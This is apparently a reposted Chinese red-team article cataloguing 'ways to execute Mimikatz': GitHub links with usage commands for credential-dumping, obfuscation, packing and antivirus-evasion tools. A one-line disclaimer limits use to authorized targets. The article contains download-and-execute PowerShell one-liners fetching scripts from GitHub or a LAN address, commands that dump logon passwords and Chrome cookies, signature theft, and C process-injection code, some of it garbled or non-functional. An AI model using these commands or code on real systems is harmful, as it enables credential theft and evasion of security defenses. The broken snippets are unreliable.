只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。
go-mimikatz
1 2 |
go build ./go-mimikatz |
https://github.com/vyrus001/go-mimikatz
Rusty Mimikatz
1 2 |
cargo build --release ./target/release/mimikatz-rs |
https://github.com/memN0ps/mimikatz-rs
MimikatzFUD
1 |
.Invoke-M1m1fud2.ps1 |
https://github.com/HernanRodriguez1/MimikatzFUD
pypykatz
1 2 3 4 |
pip install -r requirements.txt python pypykatz.py python pypykatz.py lsa minidump -d ./lsass.dmp sekurlsa::logonpasswords python pypykatz.py wmi "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" sekurlsa::logonpasswords |
https://github.com/skelsec/pypykatz
BetterSafetyKatz
1 2 3 4 |
.BetterSafetyKatz.exe --DumpCreds .BetterSafetyKatz.exe --Minidump "C:WindowsTemplsass.dmp" --DumpCreds .BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domainusername" -Password "password123" --DumpCreds .BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domainusername" -Password "password123" --DumpCreds |
https://github.com/Flangvik/BetterSafetyKatz
CopyCat
1 2 3 4 |
.CopyCat.exe --dump --local .CopyCat.exe --memory "C:WindowsTempmemdump.raw" --dump .CopyCat.exe --hibernation "C:Windowshiberfil.sys" --dump .CopyCat.exe --dump --target "192.168.1.100" --username "domainusername" --password "password123" |
https://github.com/mobdk/CopyCat
PyFuscation
1 |
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1 |
https://github.com/CBHue/PyFuscation
Invoke-Cats
1 2 3 |
Invoke-Cats -pwds Invoke-Cats -certs Invoke-Cats -CustomCommand |
https://github.com/DanMcInerney/Invoke-Cats
WinBoost
1 |
csc.exe /platform:x64 /target:exe /unsafe winboost.cs |
https://github.com/mobdk/WinBoost
mimidogz
1 |
.Invoke-Mimidogz.ps1 |
https://github.com/fir3d0g/mimidogz
CoreClass
1 2 |
"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files. Add a reference to `System.Management.Automation.dll` in your project. To do this, right-click on your project in the solution explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies" and search for "System.Management.Automation". Select it and click "Add". |
https://github.com/mobdk/CoreClass
SharpMimikatz
1 |
SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit" |
https://github.com/XTeam-Wing/SharpMimikatz
Invoke-Obfuscation
1 2 3 |
Set-ExecutionPolicy Unrestricted Import-Module .Invoke-Obfuscation.psd1 Invoke-Obfuscation -ScriptPath C:PathToMyScript.ps1 -Command All |
https://github.com/danielbohannon/Invoke-Obfuscation
SimpleMimikatzObfuscator
1 |
Commands.txt |
https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
ClickOnceKatz
1 2 3 4 |
pip install pycryptodome requests python build.py Host the "publish" directory on a web server or file share accessible to the target machine. On the target machine, navigate to the URL of the ClickOnce package in a web browser. |
https://github.com/sinmygit/ClickOnceKatz
pymemimporter
1 2 3 4 5 6 7 8 9 10 11 12 |
import base64 import pymemimporter # Load the base64-encoded module into memory encoded_module = b'YOUR_BASE64_ENCODED_MODULE_HERE' module_data = base64.b64decode(encoded_module) # Import the module from memory mem_importer = pymemimporter.PyMemImporter() loaded_module = mem_importer.load_module('<module_name>', module_data) base64 -w0 <module_name>.py > <module_name>.base64 python <script_name>.py |
https://github.com/n1nj4sec/pymemimporter
SharpDPAPI
1 2 3 |
dotnet run --project .SharpDPAPISharpDPAPI.csproj dotnet run --project .SharpDPAPISharpDPAPI.csproj masterkeys dotnet run --project .SharpDPAPISharpDPAPI.csproj domainbackupkeys |
https://github.com/GhostPack/SharpDPAPI
Plog
1 2 3 |
privilege::debug sekurlsa::Plog |
https://github.com/GamehunterKaan/Plog
StegoKatz
1 2 |
.StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path> .StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt |
https://github.com/r13mann/StegoKatz
LoadMimikatzWithDinvoke.cs
1 2 |
mimi.bat .rundll32-hijack.ps1 |
https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs
mimikatz-bypass
1 2 3 |
Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1 Set-ExecutionPolicy Unrestricted .mimikatz-bypass.ps1 |
https://github.com/corneacristian/mimikatz-bypass
Utils
1 2 |
dotnet build -r win10-x64 katz.exe <MIMIKATZ_COMMAND> |
https://github.com/ITh4cker/Utils
Eyeworm
1 2 |
python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE> python3 eyeworm.py -i <INPUT_FILE> -p <PAYLOAD_FILE> -o <OUTPUT_FILE> |
https://github.com/imsellbaox/Eyeworm
drunkenkatz
1 |
beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py" |
https://github.com/ap3r/drunkenkatz
CallBack
1 |
python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT> |
https://github.com/mobdk/CallBack
mimikatz-byPass-Huorong
1 |
python mimikatz_byPass_Huorong.py |
https://github.com/q1ya/mimikatz-byPass-Huorong
mimikatz_bypass
1 |
python mimikatz_bypass.py |
https://github.com/wangfly-me/mimikatz_bypass
HTML-mimikatz-
1 |
cmd.exe mimikatz.html |
https://github.com/vipserver/HTML-mimikatz-
Mimikatz.exe-in-JS
1 |
cmd.exe mimikatz.js |
https://github.com/hardw00t/Mimikatz.exe-in-JS
-Have-You-Seen-These-Katz-
1 2 3 4 5 6 7 8 9 10 11 12 13 |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 sed -i -e '/<#/,/#>/c\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1 sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1 |
https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-
MimiRunner
1 |
rundll32 *.log,#1 |
https://github.com/mobdk/MimiRunner
Mimikatz-PE-Injection
1 2 3 4 5 6 7 |
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* *** In the above command '/out:katz.exe katz.cs' the 'katz.cs' should be the path where initially powershell downloads the CS file *** powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe \share_ipshare_namekatz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe %temp%\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* && move mimikatz.log %temp%\katz.log && cd %temp% && del %temp%\katz.cs |
https://github.com/analyticsearch/Mimikatz-PE-Injection
ninifox
1 |
.Invoke-NiNifox.ps1 |
https://github.com/scottjosh/ninifox
Chexport
1 2 3 4 5 |
dpapi::chrome /in:"%localappdata%GoogleChromeUser DataDefaultCookies" /unprotect` `dpapi::chrome /in:"%localappdata%GoogleChromeUser DataDefaultLogin Data For Account" /unprotect` `dpapi::chrome /in:"%localappdata%GoogleChromeUser DataDefaultLogin Data" /unprotect |
https://github.com/GamehunterKaan/Chexport
mimik
1 2 3 4 |
mimikatz.exe mprotected.exe mprotected.jpg.exe mprotected.jpg.7z |
https://github.com/MisterLobster22/mimik
my-obfuscated-mimikatz
1 |
eric.ps1 |
https://github.com/lazaars/my-obfuscated-mimikatz
Invoke-Mimikatz-W10
1 |
.Invoke-Mimikatz.ps1 |
https://github.com/VDA-Labs/Invoke-Mimikatz-W10
MimiVader
1 |
python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py |
https://github.com/lawja/MimiVader
Invoke-Mimikatz
1 |
.Invoke-Mimikatz |
https://github.com/syn-ack-zack/Invoke-Mimikatz
Invoke-Mimikatz
1 |
.invokemimikatz.ps1 |
https://github.com/dfirdeferred/Invoke-Mimikatz
mimikatz_bypass
1 2 |
.XInvoke-Mimikatz.ps1 .wi10_Invoke-Mimikatz.ps1 |
https://github.com/izj007/mimikatz_bypass
JS_MimiKatzDropper
1 |
cscript.exe dropper.js |
https://github.com/leinn32/JS_MimiKatzDropper
mimicats
1 |
Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1') Invoke-Cats -Command '"privilege::debug"' |
https://github.com/Moon1705/mimicats
XorPacker
1 |
python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED |
https://github.com/tmenochet/XorPacker
PEzor
1 |
PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"' |
https://github.com/phra/PEzor
AtomPePacker
1 |
PePacker.exe mimikatz.exe -e |
https://github.com/NUL0x4C/AtomPePacker
Nim-RunPE
1 |
nim c -d:args NimRunPE.nim |
https://github.com/S3cur3Th1sSh1t/Nim-RunPE
Nimcrypt2
1 2 |
nim c -d:release nimcrypt2.nim ./nimcrypt2 --encrypt --keyfile=mykey.txt --inFile=plaintext.txt --outFile=ciphertext.txt |
https://github.com/icyguider/Nimcrypt2
ProtectMyTooling
1 |
py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe |
https://github.com/mgeeky/ProtectMyTooling
xencrypt
1 2 |
Import-Module ./xencrypt.ps1 Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 |
https://github.com/the-xentropy/xencrypt
BetterXencrypt
1 2 |
Import-Module ./betterxencrypt.ps1 Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 |
https://github.com/GetRektBoy724/BetterXencrypt
AES-Encoder
1 2 |
Invoke-AES-Encoder -InFile invoke-mimikatz.ps1 -OutFile aesmimi.ps1 |
https://github.com/Chainski/AES-Encoder
mortar
1 2 |
./encryptor -f mimikatz.exe -o bin.enc deliver.exe -d -c sekurlsa::logonpasswords -f bin.enc |
https://github.com/0xsp-SRD/mortar
.NET-Crypter
1 2 |
Browse Executable: Generate Encryption: |
https://github.com/roast247/.NET-Crypter
Custom mods + Invoke-Obfuscation
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
sed - e '/<#/,/#>/c\' "$1" sed 's/^[[: space: ]]*#.*$//g' "$1" - e sed 's/Invoke-Mimikatz/RainbowsAndUnicorns/g' "$1" - e T'T sed -e's/DumpCreds/MoreRainbows/g' "$1" Invoke-Obfuscation -ScriptPath ‘./Invoke-Mimikatz.ps1’ -Command ‘TokenAll1Out full_power.ps1’ -Quiet Invoke-Obfuscation -ScriptPath '.2.IM_critical_words.ps1' -Command ‘TokenVariable1’ -Quiet > final.ps1 IEX (New-object Net. Webclient) .Downloadstring('http: //192.168.1.104:8000/final.ps1') ; RainbowsAndUnicorns -MoreRainbows |
https://github.com/newlog/fud_mimikatz_talk
Obfuscated_Invoke-Mimikatz
1 2 3 4 5 6 7 8 |
sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1 sed -i -e '/<#/,/#>/c\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1 Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery –Force Import-Module .obfuscat_Invoke-Mimikatz.ps1 Invoke-LSASSscraper |
https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz
mimikatz_encoded
1 |
certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit |
https://github.com/mobx26/mimikatz_encoded
Encrypted_Mimikatz
1 2 |
.decrypt.ps1 .mimikatz.exe "sekurlsa::logonPasswords full" exit |
https://github.com/Sombody101/Encrypted_Mimikatz
SigThief
1 |
sigthief.py -i c: WindowsSystem32consent.exe -t mimikatz. exe -o MSCredentialTool.exe |
https://github.com/secretsquirrel/SigThief
memory+suspended
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
#include <stdio.h> #include <windows.h> const char* cmd = "powershell.exe -windowstyle hidden -command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/gentilkiwi/mimikatz/master/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds""; void obfuscate(char* str) { int len = strlen(str); for (int i = 0; i < len; i++) { str[i] = str[i] ^ 0x41; } } int main() { char* encoded_cmd = "YWxpY2UgY29tbWFuZCAtIHdpbmRvd3N0eWxlIGhpZGRlbjsgLWNvbW1hbmQgIklFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXdAZ2VudGlsa2l3aS9taW1pa2F0ei9tZXRhZGF0YS9taW1pa2F0ei5wczEnKTsgSW52b2tlLU1pbWlrYXR6IC1EdW1wQ3JlZHMK""; obfuscate(encoded_cmd); DWORD pid = GetCurrentProcessId(); HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (process == NULL) { printf("Error opening process. Error code: %lun", GetLastError()); return 1; } LPVOID remote_string = VirtualAllocEx(process, NULL, strlen(encoded_cmd), MEM_COMMIT, PAGE_READWRITE); if (remote_string == NULL) { printf("Error allocating memory. Error code: %lun", GetLastError()); CloseHandle(process); return 1; } BOOL write_result = WriteProcessMemory(process, remote_string, encoded_cmd, strlen(encoded_cmd), NULL); if (!write_result) { printf("Error writing to process memory. Error code: %lun", GetLastError()); CloseHandle(process); return 1; } HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, remote_string, 0, NULL); if (thread == NULL) { printf("Error creating remote thread. Error code: %lun", GetLastError()); CloseHandle(process); return 1; } WaitForSingleObject(thread, INFINITE); VirtualFreeEx(process, remote_string, strlen(encoded_cmd), MEM_RELEASE); CloseHandle(process); return 0; } |
XOR’d with 0xFF
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
#include <iostream> #include <cstring> using namespace std; void obfuscate(char* s) { for (int i = 0; s[i]; i++) { s[i] = s[i] ^ 0xFF; } } int main() { char* str = new char[20]; strcpy(str, "password123"); // Obfuscate the string obfuscate(str); // Print the obfuscated string cout << str << endl; // Restore the original string obfuscate(str); // Print the original string cout << str << endl; delete[] str; return 0; } |
XORing each character with the value 0xAA
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
#include <stdio.h> #include <string.h> #include <stdlib.h> int main() { char str1[] = "mimikatz.exe"; char str2[] = "powershell.exe"; char str3[] = "cmd.exe /c mimikatz.exe"; int len1 = strlen(str1); int len2 = strlen(str2); int len3 = strlen(str3); for(int i = 0; i < len1; i++) { str1[i] = str1[i] ^ 0xAA; } for(int i = 0; i < len2; i++) { str2[i] = str2[i] ^ 0xAA; } for(int i = 0; i < len3; i++) { str3[i] = str3[i] ^ 0xAA; } void* mem = VirtualAlloc(NULL, sizeof(str1) + sizeof(str2) + sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(mem, str1, sizeof(str1)); memcpy((char*)mem + sizeof(str1), str2, sizeof(str2)); memcpy((char*)mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3)); ((void(*)())mem)(); return 0; } |
Decoding and storing it in memory
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
#include <iostream> #include <windows.h> int main() { const char* encodedCmd = "x44x43x4Dx53x63x72x61x70x00x2Dx61x20x2Dx6Ex6Fx70x62x00x2Dx6Ex6Fx70x23x00x2Dx6Ex6Fx70x69x00x2Dx61x20x2Dx6Ex6Fx70x77x00x2Dx70x00x2Dx65x00x2Dx74x00x2Dx72x00x2Dx75x00x2Dx6Ex00x20x22x26x28x2Ax2Cx2Ex30x32x34x36x38x3Ax3Cx3Ex40x42x44x46x48x4Ax4Cx4Ex50x52x54x56x58x5Ax5Cx5Ex60x62x64x66x68x6Ax6Cx6Ex70x72x74x76x78x7Ax7Cx7Ex80x82x84x86x88x8Ax8Cx8Ex90x92x94x96x98x9Ax9Cx9ExA0xA2xA4xA6xA8xAAxACxAExB0xB2xB4xB6xB8xBAxBCxBExC0xC2xC4xC6xC8xCAxCCxCExD0xD2xD4xD6xD8xDAxDCxDExE0xE2xE4xE6xE8xEAxECxEExF0xF2xF4xF6xF8xFAxFCxFEx00x22"; DWORD pid; HWND hwnd = FindWindowA(NULL, "Window Name"); GetWindowThreadProcessId(hwnd, &pid); HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); LPVOID allocSpace = VirtualAllocEx(hProc, NULL, strlen(encodedCmd), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProc, allocSpace, encodedCmd, strlen(encodedCmd), NULL); HANDLE hThread = CreateRemoteThread(hProc, NULL, NULL, (LPTHREAD_START_ROUTINE)allocSpace, NULL, NULL, NULL); CloseHandle(hThread); CloseHandle(hProc); return 0; } |
Inject and execute Mimikatz in memory
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
#include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #define MIMIKATZ_PATH "C:\path\to\mimikatz.exe" int main() { // Load Mimikatz into memory HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); DWORD dwFileSize = GetFileSize(hFile, NULL); BYTE* pbFileData = (BYTE*)malloc(dwFileSize); DWORD dwBytesRead; ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL); CloseHandle(hFile); // Allocate memory for Mimikatz LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // Copy Mimikatz to allocated memory memcpy(lpMem, pbFileData, dwFileSize); // Execute Mimikatz DWORD dwExitCode; DWORD dwThreadId; HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId); WaitForSingleObject(hThread, INFINITE); GetExitCodeThread(hThread, &dwExitCode); // Free allocated memory VirtualFree(lpMem, 0, MEM_RELEASE); return 0; } |
原文始发于微信公众号(Z2O安全攻防):红队|执行Mimikatz的64种方式
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论